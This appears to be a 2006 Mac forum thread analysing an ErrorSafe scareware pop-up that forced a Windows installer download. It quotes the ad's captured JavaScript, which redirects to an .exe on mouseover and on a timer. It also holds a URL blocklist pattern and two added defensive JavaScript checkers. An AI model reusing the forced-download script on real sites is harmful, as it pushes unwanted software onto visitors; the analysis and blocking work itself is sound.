Errorsafe ?!? (Virus? Trojan? Bad joke?)

Mac Elite
Join Date: Jul 2001
Location: Switzerland
Status: Offline

Hmmm... about 2 hours ago, my Mac started displaying this strange window.
Anyone know what this is about?
I feel like I got myself a virus - even if it's possibly just a JavaScript window in OmniWeb, talking about my "Registry". 

MBP 15" 2.33GHz C2D 3GB 2*23" ACD

Mac Elite
Join Date: Jul 2001
Location: Switzerland
Status: Offline

I really wonder how I stumbled into this one.
BTW, this is what happens when one clicks on the "Cancel" button... because OmniWeb can't be quit normally.
And this is the URL all this ridiculous cr*p came from:
Code:
http://www.errorsafe.com/pages/scanner/?aid=adtiger&lid=in&ax=1&ex=1&ed=2
and
Code:
http://www.errorsafe.com/pages/scanner/index.php?aid=adtiger_ch_en_ed2&lid=in&ex=1&p=&ax=1&h=
Note "adtiger" in the first and "adtiger_ch_en_ed2" in the second URL. This could be quite clever: an ad for Tiger users logged in in Switzerland (ch), using an English browser or operating system (en).
(Last edited by workerbee; May 5, 2006 at 04:34 PM.)

MBP 15" 2.33GHz C2D 3GB 2*23" ACD

Addicted to MacNN
Join Date: Nov 2005
Location: President Skroob's Office
Status: Offline

Is it just a pop-up window in Safari?

"She's gone from suck to blow!"

Mac Elite
Join Date: Jul 2001
Location: Switzerland
Status: Offline

Originally Posted by Dark Helmet
Is it just a pop-up window in Safari?
Yep, but it's a clever one, IMHO.
I revisited the stupid site, sniffing my port 80 traffic with tcpflow to see the JavaScript behind it all -- now OmniWeb automatically downloaded "ErrorSafeFreeInstall.exe" without me clicking on any link.
This is the JS behind the download:
Code:
<SCRIPT LANGUAGE="JavaScript">
  redirect_if_exists("ErrorSafe Scanner");
  try{
    moveTo(0,0);
  }catch(e){
  }
  x=screen.width;
  y=screen.height;
  try{
    resizeTo(x,y);
  }catch(e){
  }
var instURL = 'http://download.errorsafe.com/files/installers/ErrorSafeFreeInstall.exe';
// Prompt for download only once - on mouse over
function doDownload1() {
  if(document.hover.hflag.value==0) {
    document.location.href=instURL;
    document.hover.hflag.value=10;
  }
}
// Prompt for download continuously - on mouse over
function doDownload2() {
  document.location.href=instURL;
}
// Prompt for download on frequent intervals - on mouse over
function doDownload3() {
  if(document.hover.hflag.value==0) {
    document.location.href=instURL;
    document.hover.hflag.value=10;
  }
  currentTime = new Date();
  val=currentTime.getSeconds()
  if((val%5)==0) {
    document.location.href=instURL;
  }
}
</script>
MBP 15" 2.33GHz C2D 3GB 2*23" ACD
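
An added example, not part of the post and not the site's code: a static check over captured page source that flags scripted navigations (assignments to location.href) whose target is an executable file, which is the mechanism the quoted script uses. The function name, the extension list and the benign helpURL lines are assumptions made for illustration.

```javascript
// Constructed sample: a trimmed copy of the script quoted in the post above,
// plus one benign navigation (helpURL) added for contrast.
const CAPTURED = [
  "var instURL = 'http://download.errorsafe.com/files/installers/ErrorSafeFreeInstall.exe';",
  "function doDownload1() {",
  "  if (document.hover.hflag.value == 0) {",
  "    document.location.href = instURL;",
  "    document.hover.hflag.value = 10;",
  "  }",
  "}",
  "function doDownload2() {",
  "  document.location.href = instURL;",
  "}",
  "var helpURL = 'http://www.example.com/help.html';",
  "function showHelp() { document.location.href = helpURL; }",
].join('\n');

// File types that should not arrive through a scripted navigation (assumed list).
const EXEC_EXT = /\.(exe|msi|scr|bat|cmd|pkg|dmg|command|sh)(?:[?#]|$)/i;

function findScriptedDownloads(source) {
  // Pass 1: names bound to a string literal that holds an executable URL.
  const execVars = new Map();
  const bindRe = /\b([A-Za-z_$][\w$]*)\s*=\s*(['"])(https?:\/\/[^'"]+)\2/g;
  for (const m of source.matchAll(bindRe)) {
    if (EXEC_EXT.test(m[3])) execVars.set(m[1], m[3]);
  }
  // Pass 2: assignments to location / location.href that use such a name,
  // or an executable URL literal directly.
  const navRe = /\blocation(?:\.href)?\s*=\s*(?:(['"])([^'"]+)\1|([A-Za-z_$][\w$]*))/;
  const findings = [];
  source.split('\n').forEach((text, i) => {
    const m = navRe.exec(text);
    if (!m) return;
    const target = m[2] !== undefined ? m[2] : execVars.get(m[3]);
    if (target && EXEC_EXT.test(target)) {
      findings.push({ line: i + 1, target });
    }
  });
  return findings;
}

console.log(findScriptedDownloads(CAPTURED));
```
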

Professional Poster
Join Date: Jan 2002
Location: London, UK
Status: Offline

Have you reported this to OmniGroup?
Is this popping up even with pop-up windows blocked?

Mac Elite
Join Date: Jul 2001
Location: Switzerland
Status: Offline

Originally Posted by JKT
Have you reported this to OmniGroup?
Is this popping up even with pop-up windows blocked?
Yes, and yes.
You can avoid this idiotic stuff by entering
Code:
/.*\.errorsafe\.com
into OW's blocked URLs list.

MBP 15" 2.33GHz C2D 3GB 2*23" ACD

Professional Poster
Join Date: Jan 2002
Location: London, UK
Status: Offline

What about Safari? I would deactivate the Open in Safe applications option before trying. While this particular soft-/malware is obviously for Windows, the JavaScript could potentially be used to download more malicious files on the Mac too, so it is probably worthwhile drawing Apple's attention to it.

Professional Poster
Join Date: Jan 2001
Location: Manchester,UK
Status: Offline

Safari would popup that "whatever.exe is an application" type sheet from the download window, so you would have a good idea of what's going on.
IMHO this is why Apple shouldn't be going blindly down the 'Seamless Windows virtualisation' route, where you can easily run almost all Windows exe's out of the box.

Addicted to MacNN
Join Date: Aug 2004
Location: FFM
Status: Offline

This is just a JavaScript dialog. It is not a pop-up window, so pop-up blocking doesn't (and shouldn't) prevent this. It's just like the "You have a new private message" dialog you get here in this forum. There is nothing malicious/virus/malware going on here. Worst that could happen would be some crap downloading to your Desktop.
OmniWeb should make it more obvious that this is a JavaScript dialog maybe, and not a dialog that came from OmniWeb itself or the system.

Mac Elite
Join Date: Jul 2001
Location: Switzerland
Status: Offline

Originally Posted by TETENAL
There is nothing malicious/virus/malware going on here. Worst that could happen would be some crap downloading to your Desktop.
Please excuse me for disagreeing a little here: I do find this to be very malicious, in fact. I can readily imagine a Windows discussion board, 10 years ago, and someone saying "There is nothing malicious/virus/malware going on here."
I wonder what would have happened if my mother, or even my girlfriend, had surfed the macnn forums (where I probably picked this up), suddenly found this insidious window popping up, unable to quit the application, and it automatically downloading some code after clicking the cancel button. Code which may, or may not, then start auto-executing on the Mac -- it could have been something else besides an .exe. It could even be a shell script or something parading as an exe, just so we clever types think "Ha! You stupid Windows guys will not get *me*, I'm on a Mac, I'm safe!".
But, of course, I'm panicking
BTW, I'd like to see where this page came from, as I certainly never did consciously go anywhere near it. My OW history file shows forums.macnn.com addresses just before the errorsafe URL. Does anyone know where OW 5.5 SP7 keeps its cache files?
Edit: found the Cache files.
(Last edited by workerbee; May 6, 2006 at 02:45 AM.)

MBP 15" 2.33GHz C2D 3GB 2*23" ACD

Baninated
Join Date: May 2005
Location: England
Status: Offline

Administrator
Join Date: Apr 2001
Location: San Antonio TX USA
Status: Offline

Yeah, it's malicious, though not damaging (which is what I think TETENAL meant by "malicious"). I think Firefox also blocks downloads of such files, or at least warns you (which should be a dead giveaway for most people). I'll have to check.
Any idea what site you got this little PITA from?

Glenn -----
OTR/L, MOT, Tx

Mac Elite
Join Date: Jul 2001
Location: Switzerland
Status: Offline

Originally Posted by ghporter
Any idea what site you got this little PITA from?
Unfortunately, despite searching through the OS cache files, I've not found the original link. Unless they've got some fancy time-shifting code going on, there's a big chance it came from here, forums.macnn.com. The 10 to 15 last entries in the history.plist before errorsafe first pops up are all forum URLs.
This is a suspicious URL I found:
Code:
http://locator1.cdn.imagesrvr.com/sites/errorsafe.com/www/pages/scanner/libs/checksoft.js
MBP 15" 2.33GHz C2D 3GB 2*23" ACD
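
An added example, not from the thread and not OmniWeb's own code: it runs the blocked-URL pattern posted earlier in the thread against the URLs quoted in the thread, and shows that it misses the CDN-hosted script above and the bare domain while also matching an unrelated URL. It assumes the browser applies the pattern as an unanchored regex search over the whole URL; blockedByHost and the two URLs marked constructed are illustrative.

```javascript
// The pattern from the post, as entered into the blocked-URL list.
const POSTED_PATTERN = /\/.*\.errorsafe\.com/;

// Assumption: the pattern is applied as an unanchored search over the full URL.
function blockedByPattern(url) {
  return POSTED_PATTERN.test(url);
}

// Alternative (illustrative): parse the URL and decide on the hostname, plus a
// heuristic for content served from another host under a path segment named
// after the blocked domain.
function blockedByHost(url, domain = 'errorsafe.com') {
  let u;
  try { u = new URL(url); } catch { return false; }
  const host = u.hostname.toLowerCase().replace(/\.$/, '');
  if (host === domain || host.endsWith('.' + domain)) return true;
  return u.pathname.toLowerCase().split('/').includes(domain);
}

const SAMPLES = [
  // Quoted in the thread
  'http://www.errorsafe.com/pages/scanner/?aid=adtiger&lid=in&ax=1&ex=1&ed=2',
  'http://download.errorsafe.com/files/installers/ErrorSafeFreeInstall.exe',
  'http://locator1.cdn.imagesrvr.com/sites/errorsafe.com/www/pages/scanner/libs/checksoft.js',
  // Constructed: bare domain, and an unrelated page that only mentions the name
  'http://errorsafe.com/',
  'http://example.org/search?q=www.errorsafe.com',
];

function compare(urls = SAMPLES) {
  return urls.map((url) => ({
    url,
    pattern: blockedByPattern(url),
    host: blockedByHost(url),
  }));
}

for (const r of compare()) {
  console.log(`pattern=${r.pattern} host=${r.host} ${r.url}`);
}
```
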

Dedicated MacNNer
Join Date: Sep 2005
Status: Offline

Maybe you should turn on the pop-up blocker, and get virex.

Mac Elite
Join Date: Jul 2001
Location: Switzerland
Status: Offline

Originally Posted by the macimum
Maybe you should turn on the pop-up blocker, and get virex.
Both will not do anything in this case, as was stated a few postings above.

MBP 15" 2.33GHz C2D 3GB 2*23" ACD

Addicted to MacNN
Join Date: Aug 2004
Location: FFM
Status: Offline

Originally Posted by workerbee
Please excuse me for disagreeing a little here: I do find this to be very malicious, in fact.
It was just a JavaScript-dialog, nothing more. That can't do anything other than display a message. Copy the following, paste it into the address field of your browser and press return.
javascript :alert("If you press OK the world is coming to an end.")
Does that mean the world is coming to an end? Of course not. It's just a message in a JavaScript dialog box. That company used a JavaScript message dialog to scare people into buying an unnecessary product. That is all. They could just as well have used a pop up window or a JPEG with the screenshot of a window frame. All of those would have been dirty marketing tricks, but none are "malware" or trojans or what you think they are.
Originally Posted by workerbee
I wonder what would have happened if my mother, or even my girlfriend, had surfed the macnn forums (where I probably picked this up), suddenly found this insidious window popping up, unable to quit the application, and it automatically downloading some code after clicking the cancel button.
You don't need JavaScript to automatically download something. You could do the same thing with a pop-up window, frames or a meta refresh tag. This is all not a security problem.
Originally Posted by workerbee
Code which may, or may not, then start auto-executing on the Mac
Code is never auto-executed on the Mac (unless there is a bug, which in this case there isn't). Safari only auto-opens files that are considered 'safe' (which explicitly excludes programs and scripts).
Originally Posted by workerbee
it could have been something else besides an .exe. It could even be a shell script or something parading as an exe, just so we clever types think "Ha! You stupid Windows guys will not get *me*, I'm on a Mac, I'm safe!".
Yes, you could always accidentally download a trojan. There is currently nothing (digital signature discussion notwithstanding) that will protect you from trojans. That's why you don't double-click anything that unexpectedly downloaded from the web. This is basic – and required – media competence today.
Originally Posted by workerbee
BTW, I'd like to see where this page came from, as I certainly never did consciously go anywhere near it. My OW history file shows forums.macnn.com addresses just before the errorsafe URL.
Since this is "advertising" it probably came from the ad server of MacNN.

Admin Emeritus
Join Date: Oct 1999
Location: Zurich, Switzerland
Status: Offline

I want to murder the f***ing ad people. No matter what we tell them, they put junk in circulation.
tooki

Dedicated MacNNer
Join Date: Sep 2005
Status: Offline

Originally Posted by tooki
I want to murder the f***ing ad people. No matter what we tell them, they put junk in circulation.
tooki
I mean, who doesn't? Except the ad people themselves.

Addicted to MacNN
Join Date: Aug 2004
Location: FFM
Status: Offline

I just got the same thing here. Only in awfully bad German.

Mac Elite
Join Date: Feb 2002
Location: Hilton Head, SC
Status: Offline

That's for Windows though... not too much to worry about.

Fresh-Faced Recruit
Join Date: Jun 2006
Status: Offline

Mac Elite
Join Date: Jul 2001
Location: Switzerland
Status: Offline

Originally Posted by Tyler McAdams
That's for windows though... not too much to worry about.
Don't worry: TETENAL is not worried in the least, because he/she knows that with OS X he/she is perfectly absolutely 100% positively safe & secure from any and all imaginable harm 

MBP 15" 2.33GHz C2D 3GB 2*23" ACD

Mac Elite
Join Date: Jul 2001
Location: Switzerland
Status: Offline

Originally Posted by TETENAL
I just got the same thing here. Only in awfully bad German.
Actually, I rather like "Fröste"
Edit: Oh, and did you find this JS pop-up in the least annoying?

MBP 15" 2.33GHz C2D 3GB 2*23" ACD

Addicted to MacNN
Join Date: Aug 2004
Location: FFM
Status: Offline

Originally Posted by workerbee
Edit: Oh, and did you find this JS pop-up in the least annoying?
Yes, I was somewhat annoyed by the JavaScript dialog. MacNN shouldn't partner with scammers.
Originally Posted by workerbee
Don't worry: TETENAL is not worried in the least, because he/she knows that with OS X he/she is perfectly absolutely 100% positively safe & secure from any and all imaginable harm
That's not what I said. I said that a JavaScript dialog poses no threat.

Administrator
Join Date: Apr 2001
Location: San Antonio TX USA
Status: Offline

MacNN probably has less choice about who the adservers put on the pages than you might think. Most online advertisers don't even have a clue where their ads actually go - they pay the adservers to place the ads. That means that adservers are targets for scammers who want to scam anyone they can.

Glenn -----
OTR/L, MOT, Tx

Mac Elite
Join Date: Jul 2001
Location: Switzerland
Status: Offline

Originally Posted by TETENAL
That's not what I said. I said that a JavaScript dialog poses no threat.
I know, and of course you're absolutely right.
But you also said
Originally Posted by TETENAL
Code is never auto-executed on the Mac (unless there is a bug, which in this case there isn't). Safari only auto-opens files that are considered 'safe' (which explicitly excludes programs and scripts).
... about which I'm feeling somewhat less secure; don't like stuff like
http://secunia.com/advisories/18963/ or http://www.heise.de/english/newsticker/news/69862
But that's just me 

MBP 15" 2.33GHz C2D 3GB 2*23" ACD

Addicted to MacNN
Join Date: Aug 2004
Location: FFM
Status: Offline

Originally Posted by workerbee
Those were bugs. I said that "Code is never auto-executed on the Mac (unless there is a bug". This JavaScript dialog however is not based on a bug. The software behaves as it should.